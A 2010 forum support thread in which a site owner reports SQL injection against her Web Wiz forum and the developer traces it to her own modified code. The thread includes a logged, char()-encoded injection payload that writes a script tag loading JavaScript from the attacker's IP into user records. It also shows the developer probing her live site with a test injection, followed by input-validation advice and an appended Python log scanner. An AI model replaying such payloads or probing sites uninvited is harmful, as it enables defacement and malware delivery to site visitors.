diaperpin-jen
Newbie
Joined: 23 May 2007
Status: Offline
Points: 13
Topic: VIRUS Attack
Posted: 05 April 2010 at 1:16pm
My web site has been attacked 3 days in a row via SQL injections. I spent yesterday locking down all of my code to remove the possibility of a hacker updating my database. I did NOT touch the Web Wiz Forums or NewsPad code because I did not want to risk making a mess of code I have not written.
I have many tables in my site but the only ones targeted were Web Wiz Forums and Web Wiz NewsPad. Therefore I believe the hackers are familiar with Web Wiz table structures.
I am posting this note for two reasons.
First, to warn other Web Wiz customers that this is happening so you are ready just in case you are targeted as well.
Secondly, to ask if others have had such a problem and if there are suggestions to close up any gaps, particularly from the forum or NewsPad code?
WebWiz-Bruce
Admin Group
Web Wiz Developer
Joined: 03 September 2001
Location: Bournemouth
Status: Offline
Points: 9844
Posted: 05 April 2010 at 1:41pm
There are no issues with SQL Injections in Web Wiz Forums or Web Wiz NewsPad.
These viruses have been around a long time and are generic, attacking the structure of any database schema, not just Web Wiz software. When they first appeared a few years ago we saw Web Wiz Forums and NewsPad installations get hit as many as 20 times per second by these SQL Injection viruses, without causing any issues.
Over the last few years we have had a number of people who have had their databases compromised by these SQL Injection viruses, convinced that the problem has been with Web Wiz products; however, after lengthy investigations it has always turned out the issue was caused by their own pages outside of Web Wiz software or by modifications to the software.
I can be 100% sure that your SQL Injections will not be a result of Web Wiz Forums or NewsPad. You should look at your own pages on your website and any modifications that you have made to the Web Wiz software.
Many thousands of hours have been and still are spent on security, making sure that our products are the most secure available. Each month security audits are carried out looking at new threats and releasing new versions if anything is found. For this reason many large hacking websites use our software and have also worked with us simulating attacks and looking for holes to ensure that our software is fully secure.
Web Wiz Forums and NewsPad are well protected against SQL Injection; it even goes as far in Web Wiz Forums 9.50 and above as to detect an SQL Injection attack from one of these viruses and, when detected, stop the page processing to reduce server load and prevent DoS attacks that could overrun a web server if a website came under a large attack from one of these SQL Injection viruses.
Edited by WebWiz-Bruce - 05 April 2010 at 1:50pm
diaperpin-jen
Newbie
Joined: 23 May 2007
Status: Offline
Points: 13
Posted: 06 April 2010 at 1:30am
The hacker is back and I was able to log the problem.
The attack was in the form of SQL injection through one of the forum pages. I am listing the information I logged below:
Page: /forum/registration_rules.asp
IP Address: 94.102.52.27
QueryString: FID=01+update+tblAuthor+set+Username=cast(Username+as+varchar(8000))%2Bcast(char(060)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(39)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(57)%2Bchar(52)%2Bchar(46)%2Bchar(49)%2Bchar(48)%2Bchar(50)%2Bchar(46)%2Bchar(53)%2Bchar(50)%2Bchar(46)%2Bchar(50)%2Bchar(55)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(99)%2Bchar(104)%2Bchar(105)%2Bchar(110)%2Bchar(46)%2Bchar(106)%2Bchar(115)%2Bchar(39)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)+as+varchar(8000))--
I want to make sure you and other Web Wiz software users are aware of this problem so you can deal with it immediately. I am in danger of having much of my data wiped out by this person. Each attack seems more and more destructive.
Please look into this page and lock it down as best you can.
WebWiz-Bruce
Admin Group
Web Wiz Developer
Joined: 03 September 2001
Location: Bournemouth
Status: Offline
Points: 9844
Posted: 06 April 2010 at 10:40am
I have just located your website from the email address used to register on this forum and have found the issue, which is to do with your own modifications!!
I had a look at your registration_rules.asp page and passed across a non-numeric value as part of the FID querystring; I then got an error which you would not get from an unmodified Web Wiz Forums.
The error was an SQL error on line 320 of the file includes/google_adsense_inc.asp. The original includes/google_adsense_inc.asp does not have a line 320 and also does not interact with the database.
It would seem that the problem here is that you have modified the file includes/google_adsense_inc.asp to include code that interacts with the database. This code does not appear to have any protection from SQL Injection.
To fix the issue you should either fix the modified code in includes/google_adsense_inc.asp, or better still upgrade to the latest version and not modify the code.
diaperpin-jen
Newbie
Joined: 23 May 2007
Status: Offline
Points: 13
Posted: 06 April 2010 at 11:43am
Yes - Thank you. I looked into this last night and saw that the hole was in google_adsense_inc.asp.
The error you received actually indicates that my changes worked. If you didn't get the error you would have succeeded in changing the values in my database.
WebWiz-Bruce
Admin Group
Web Wiz Developer
Joined: 03 September 2001
Location: Bournemouth
Status: Offline
Points: 9844
Posted: 06 April 2010 at 12:15pm
I have just checked your forum and it is still vulnerable to an SQL Injection attack. Maybe not the one that you posted, but it is still vulnerable; see the error I got below:
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'test and a.author_id = p.author_id and g.group_id = a.group_id union select g.name as groupname, a.username, a.author_id , 2 '.
This means that my input 'test, along with the single-quote break, was still used in the SQL query. This was only a test so no harm done, but I could change this to easily display content from your database, delete tables, etc.
You need to sanitise any querystring input before it is used in an SQL query. In this case, as you are using a numeric value passed via the FID querystring, you can use the following:

If IsNumeric(Request.QueryString("FID")) Then
    intForumID = CInt(Request.QueryString("FID"))
Else
    intForumID = 0
End If
Then in your SQL reference the variable not the querystring.
Edited by WebWiz-Bruce - 06 April 2010 at 12:18pm
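The two halves of this thread, the logged querystring in the earlier post and the numeric-validation advice above, can be turned into a detection check. What follows is an added example, not part of the thread and not Web Wiz's own code: a small Python script that scans IIS-style log lines for a parameter that should be numeric but carries SQL keywords, and decodes the chained char() calls so a defender can see which string the injection was trying to write into the table. The log line format, the IP addresses and the short payload are all constructed for the example (the real payload logged in the thread decodes the same way, it is just longer). The numeric check here accepts only digit strings, which is stricter than VBScript's IsNumeric, since IsNumeric also accepts signs, decimals and exponents.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines (date time method path query client-ip status).
# Only the middle line carries an injection; its payload builds "<script>" from char() calls.
SAMPLE_LOG = """\
2010-04-06 00:30:12 GET /forum/registration_rules.asp FID=12 203.0.113.5 200
2010-04-06 00:30:15 GET /forum/registration_rules.asp FID=01+update+tblAuthor+set+Username=cast(Username+as+varchar(8000))%2Bcast(char(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))-- 203.0.113.77 500
2010-04-06 00:31:02 GET /forum/registration_rules.asp FID=7 198.51.100.9 200
"""

# char(N) as used by SQL Server to build a string one byte at a time
CHAR_CALL = re.compile(r"char\((\d{1,3})\)", re.IGNORECASE)
# Keywords that have no business inside a value meant to be a forum id
SQL_MARKERS = re.compile(
    r"\b(update|insert|delete|union|select|cast|exec|declare)\b", re.IGNORECASE
)


def decode_char_calls(sql):
    """Collapse char(60)+char(115)+... into the literal text it assembles.

    char(0) padding (used to fill the column up to its width) is dropped.
    """
    codes = [int(n) for n in CHAR_CALL.findall(sql)]
    return "".join(chr(n) for n in codes if 0 < n < 256)


def analyse_query(query_string, numeric_params=("FID",)):
    """Return a list of findings for one raw (still URL-encoded) query string.

    An empty list means nothing looked wrong.
    """
    findings = []
    for pair in query_string.split("&"):
        name, _, raw_value = pair.partition("=")
        value = unquote_plus(raw_value)  # %2B -> '+', '+' -> ' '
        if name in numeric_params and not value.isdigit():
            findings.append(f"{name} expected numeric, got {value[:40]!r}")
        if SQL_MARKERS.search(value):
            findings.append(f"{name} carries SQL keywords")
        decoded = decode_char_calls(value)
        if decoded:
            findings.append(f"{name} builds string via char(): {decoded!r}")
    return findings


def scan_log(text):
    """Walk the log and return one record per request that raised a finding."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        _date, _time, _method, path, query, client_ip, _status = line.split()
        findings = analyse_query(query)
        if findings:
            hits.append({"ip": client_ip, "path": path, "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} -> {hit['path']}")
        for finding in hit["findings"]:
            print("   ", finding)
```

Feeding a real IIS log through scan_log only needs the field split adjusted to that log's column order; the decoding and the per-parameter checks stay the same. Reviewing the decoded string is what tells you whether the injected content was a script tag, as in this thread, or something else.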
diaperpin-jen
Newbie
Joined: 23 May 2007
Status: Offline
Points: 13
Posted: 06 April 2010 at 12:39pm
Thanks! I will look into it.
diaperpin-jen
Newbie
Joined: 23 May 2007
Status: Offline
Points: 13
Posted: 06 April 2010 at 1:20pm
Fixed. I appreciate you taking the time to look at my site. I will see how you handled text inputs as well.